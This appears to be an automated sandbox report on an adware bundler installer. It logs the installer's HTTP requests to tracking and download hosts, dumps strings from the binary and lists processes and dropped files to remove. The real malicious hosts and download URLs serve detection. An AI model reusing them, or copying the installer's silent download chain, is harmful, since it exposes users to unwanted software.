Date: Tue, 21 Oct 2014 02:32:14 GMT
Content-Type: application/octet-stream
Content-Length: 1554432
Last-Modified: Mon, 13 Oct 2014 10:14:10 GMT
Connection: close
Content-Disposition: attachment; filename="GenesisInstaller.exe"
Accept-Ranges: bytes

<<< skipped >>>

GET /test.html HTTP/1.1
Host: track.v2.sslsecure4.com
Connection: Close


HTTP/1.1 200 OK
Content-Type: text/html
Date: Tue, 21 Oct 2014 02:31:55 GMT
Server: nginx
Content-Length: 8
Connection: Close
correct...


GET /debug/Version/4_0_6_30/Nsis/GetInfo HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:31:35 GMT
Server: Apache
Set-Cookie: vsid=916vr1614042954825116; expires=Sun, 20-Oct-2019 02:31:35 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

GET //Displays/Softwares/c9c92824_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:24 GMT
Content-Type: text/html
Last-Modified: Thu, 09 Jan 2014 10:45:56 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip

<<< skipped >>>

GET /ba/full/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newgenstatsnet.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:13 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1413807219"
Last-Modified: Mon, 20 Oct 2014 12:13:39 GMT
Cache-Control: max-age=2514
Content-Length: 11426128
Content-Type: application/x-msdownload
X-HW: 1413858733.dop006.ny2.t,1413858733.cds053.ny2.c
Content-Disposition: attachment; filename="setup.exe"

<<< skipped >>>

GET /cm/softlate/speedupmypc/option9/setup/speedupmypc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: files.uniblue.com
Connection: Close


HTTP/1.1 200 OK
x-amz-id-2: PJhb3matOwf los/RaPUHQsIe/ALJfuy9EzelIJ 3cnnmmNzdDsxx6XNUr8pXDPP
x-amz-request-id: C9D3001AD0E2D90A
Date: Tue, 21 Oct 2014 02:32:20 GMT
x-amz-meta-built_from_package_id: 23466
x-amz-meta-built_from_package_version: 84
Cache-Control: max-age 86400,public
Last-Modified: Fri, 10 Oct 2014 19:53:33 GMT
ETag: "7ddda0daedd1ef875325bad41071317a"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 1294552
Server: AmazonS3

<<< skipped >>>

GET //Displays/Softwares/6fe4b061_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:23 GMT
Content-Type: text/html
Last-Modified: Tue, 25 Mar 2014 18:46:17 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip

<<< skipped >>>

GET /installer.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: get.ctx-genesis.com
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:14 GMT
Content-Type: application/octet-stream
Content-Length: 1554432
Last-Modified: Mon, 13 Oct 2014 10:14:10 GMT
Connection: close
Content-Disposition: attachment; filename="GenesisInstaller.exe"
Accept-Ranges: bytes

<<< skipped >>>

GET /debug/Version/4_0_6_30/Nsis/Start HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:31:34 GMT
Server: Apache
Set-Cookie: vsid=905vr1614042946610931; expires=Sun, 20-Oct-2019 02:31:34 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

GET /debug/Version/4_0_6_30/Nsis/PreRun HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:31:37 GMT
Server: Apache
Set-Cookie: vsid=926vr1614042979420107; expires=Sun, 20-Oct-2019 02:31:37 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

GET /test.html HTTP/1.1
Host: api.v2.sslsecure3.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:56 GMT
Server: Apache
Set-Cookie: vsid=913vr1614043167216346; expires=Sun, 20-Oct-2019 02:31:56 GMT; path=/; domain=api.v2.sslsecure3.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


GET /cm/softlate/speedupmypc/option9/setup/speedupmypc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: files.uniblue.com
Connection: Close


HTTP/1.1 200 OK
x-amz-id-2: NNkBvtCrRII36SrsAPAV9S8E22WW0HFAgJZbt5Jcwc9QUjK6ZG2S608Vfv7ij9WL
x-amz-request-id: 27AD26F1F1EBA713
Date: Tue, 21 Oct 2014 02:32:19 GMT
x-amz-meta-built_from_package_id: 23466
x-amz-meta-built_from_package_version: 84
Cache-Control: max-age 86400,public
Last-Modified: Fri, 10 Oct 2014 19:53:33 GMT
ETag: "7ddda0daedd1ef875325bad41071317a"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 1294552
Server: AmazonS3

<<< skipped >>>

GET /debug/Version/4_0_6_30/Nsis/CopyFiles HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:31:36 GMT
Server: Apache
Set-Cookie: vsid=916vr1614042962527815; expires=Sun, 20-Oct-2019 02:31:36 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

GET //Displays/Softwares/9103144e_display (1).html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:24 GMT
Content-Type: text/html
Last-Modified: Tue, 01 Jul 2014 09:28:50 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip

<<< skipped >>>

GET //Displays/Softwares/9103144e_display (1).html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:22 GMT
Content-Type: text/html
Last-Modified: Tue, 01 Jul 2014 09:28:50 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip

<<< skipped >>>

GET //Styles/Softwares/844a2c3b_browserapp.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:22 GMT
Content-Type: application/zip
Content-Length: 734
Last-Modified: Tue, 01 Jul 2014 09:26:57 GMT
Connection: close
ETag: "53b27ee1-2de"
Accept-Ranges: bytes


The Application connects to the servers at the following location(s):

%original file name%.exe_940:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe" /path="c:\%original file name%.exe" ""
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswB5.tmp\nsisdl.dll
f718db1e70c.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe->C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\parent.txt
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswB5.tmp
4a5df93e68ff718db1e70c.exe\e5d39da6f3e34d49a99c04aec898786a\parent.txt
f718db1e70c.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe
f.lXs
.nIrR
<add key="UseElevatedPermissions" value="0" />
<system.net>
<httpWebRequest useUnsafeHeaderParsing="true"/>
</system.net>
<system.web>
<httpRuntime maxRequestLength="19000"/>
<webServices>
<add name="HttpGet"/>
<add name="HttpPost"/>
</webServices>
</system.web>
<supportedRuntime version="v2.0.50727"/>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/>
v2.0.50727
setup.exe
CallUrl
.ctor
System.Resources
System.Reflection
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.IO
System.Net
WebRequest
HttpWebRequest
IWebProxy
get_DefaultWebProxy
WebResponse
HttpWebResponse
Password
<PrivateImplementationDetails>{B9D36289-C9B1-42FE-A2FC-62AE8DAAE9F9}
System.Security.Cryptography
PasswordDeriveBytes
set_Key
4.0.6.30
$a7de9600-ff8a-4d28-a544-9eaad1f27abc
_CorExeMain
mscoree.dll
.6M%u_T(
%original file name%.exe
B50A97~1.EXE
718db1e70c.exe\e5d39da6f3e34d49a99c04aec898786a\parent.txt
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswB5.tmp
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshB4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0a1</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
be393027e81a4b88b52679c3751607ae.txt


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mscorsvw.exe:172
    spidentifierimpl.exe:528
    %original file name%.exe:940

  2. Delete the original Application file.
  3. Delete or disinfect the following files created/modified by the Application:

    %Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\inetc.dll (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\SPtool.dll (180359 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\close.html (384 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\BingHP4info.dfe (740 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo3.png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-img.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Browser app shoppinginfo.dfe (734 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\boton_xl.jpg (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-logo2.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\less.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\boton.jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Genesisinfo.dfe (712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app.png (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\box.html (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2A.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\check-close.png (243 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9U0U7603\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\group.html (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\TheBestDeals\info.html (1323 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\finish.html (299 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\45UV0H2Z\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app_obv.jpg (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\mypcbackup.png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\browserapp.css (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\style.css (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\BingHP4\info.html (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\mypcbackup.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\percentage-bg.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\jquery.min.js (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\spidentifierimpl.exe (89955 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2-gris.png (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPUB4PUN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-icon.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Genesis 2\info.html (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo2.png (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\butpause.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Genesis 2info.dfe (712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Browser appinfo.dfe (734 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\MyBackupPcinfo.dfe (611 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Browser app shopping\info.html (1251 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\MyBackupPc\info.html (1106 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WL2B4963\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\more.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress_small.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\vuupc.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1-small.png (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\options.html (965 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\genesis.css (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\templateDisplays.dfe (150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3B.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2-gris-small.png (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\TheBestDealsinfo.dfe (750 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\instalando.html (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet-shortw.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3C.css (638 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2C.css (578 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\templateStyle.dfe (4069 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\welcome.html (151 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\SpeedUpMyPcinfo.dfe (1215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-logo.png (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet-short.gif (54 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\logo-win.jpg (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-img2.png (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\config.dmc (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\cross.jpg (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Wajaminfo.dfe (3326 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3D.css (539 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2B.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Genesis\info.html (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Browser app\info.html (1497 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app.jpg (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\butplay.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position1A.css (421 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\binghp4.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1.png (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1-gris.png (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3A.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Vuupcinfo.dfe (741 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1a.png (11 bytes)
    %System%\wbem\Logs\wbemprox.log (228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Wajam\info.html (3609 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Vuupc\info.html (1287 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress_small_bg.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\check.jpg (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\speedupmypc.css (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\wajam.css (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2.png (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\thebestdeals.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet.gif (58 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Dockings.dfe (2617 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position4A.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-big.png (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\SpeedUpMyPc\info.html (2953 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin.dmc (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\be393027e81a4b88b52679c3751607ae.txt (7854 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nswB5.tmp\nsisdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe (1431 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\res.txt (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe.config (767 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
